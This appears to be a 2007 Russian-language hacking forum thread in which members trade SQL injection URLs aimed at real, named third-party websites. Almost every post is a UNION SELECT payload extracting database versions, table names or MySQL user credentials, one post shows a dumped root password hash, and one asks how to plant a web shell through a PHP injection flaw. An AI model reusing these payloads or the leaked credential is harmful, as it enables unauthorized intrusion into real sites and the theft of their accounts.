 |
|
14.03.2007, 01:17
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
С нами:
10160966
Репутация:
1719
|
|
Код:
http://www.xmlhack.com/read.php?item=-1+union+select+1,table_name,3,4,5,6,7,8,9,10,11+from+information_schema.tables/*
таблицы юзеров нет =\ обидно.. |
|
|
14.03.2007, 01:23
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
С нами:
10669286
Репутация:
1942
|
|
http://www.britishcat.ru/articles.html?Action=ShowArticle&Article=-1+union+select+1,2,version(),4,5/*
коськи =))))))
|
|
|
|
14.03.2007, 01:30
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
С нами:
10669286
Репутация:
1942
|
|
http://kahani.com/current.php?id=-6+union+select+1,convert(version()+using+latin1),3 ,4,5,6
|
|
|
|
14.03.2007, 01:46
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
С нами:
10313606
Репутация:
1327
|
|
Сообщение от \6/
http://kahani.com/current.php?id=-6+union+select+1,convert(version()+using+latin1),3 ,4,5,6
вот так повкуснее будет
http://kahani.com/current.php?id=-6+union+select+1,convert(concat(user,char(58),pass word)+using+latin1),3,4,5,6+from+mysql.user/*
root:1386b54e67928d79
|
|
|
|
14.03.2007, 02:01
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
С нами:
10669286
Репутация:
1942
|
|
http://www.themarchives.com/showproject.php?ID=-5+union+select+1,convert(version()+using+latin1),3 ,4,5/*
|
|
|
|
14.03.2007, 02:11
|
|
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
С нами:
10085717
Репутация:
590
|
|
Код:
http://www.aiap.it/news.php?ID=-864%20UNION%20SELECT%201,database(),3,4,5,6,7,8/*
Код:
http://www.top-ix.org/standard.php?id=-59%20UNION%20SELECT%201,2,3,4,5,user,7+from+mysql.user/*
Код:
http://www.buhgalteria.com.ua/Hit.html?id=-1+union+select+1,2,3,4,5,6,7,convert(password%20using%20cp1251)%20+from+mysql.user/*
|
|
|
|
14.03.2007, 02:51
|
|
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
С нами:
10686686
Репутация:
447
|
|
Код:
http://www.joshuaproject.net/scalelist.php?scalevalue=-1.2+union+select+null,version(),null,null,null,null,null,null,null,null,null,null,null/*
|
|
|
|
14.03.2007, 03:26
|
|
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
С нами:
10225766
Репутация:
2062
|
|
15 колонок, Mysql3:
Код:
__http://www.kennisalliantie.nl/index.php?id=3+group+by+16/*
Последний раз редактировалось m0nzt3r; 14.03.2007 в 19:20..
Причина: не надо лишнего
|
|
|
|
14.03.2007, 11:25
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
С нами:
10669286
Репутация:
1942
|
|
http://www.sabeel.org/etemplate.php?id=-13+union+select+1,2,3,4,version(),6,7,8,9,10,11,12 ,13
|
|
|
|
14.03.2007, 12:07
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
С нами:
10669286
Репутация:
1942
|
|
Сообщение от fersa
Нашёл уязвимость:
Код:
http://localhost/index.php?f=1&s=1'
Как можно шелик влить =)
При нажатии на сцылку выдаёт ошибку следующего рода:
Код:
Parse error: parse error, unexpected T_CONSTANT_ENCAPSED_STRING, expecting ']' in с:\appserv\www\index.php(497) : runtime-created function on line 1
Warning: usort() [function.usort]: Invalid comparison function. in c:\appserv\www\index.php on line 497
? 
http://www.brodyweiser.com/aboutus_detail.php?id=-13+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
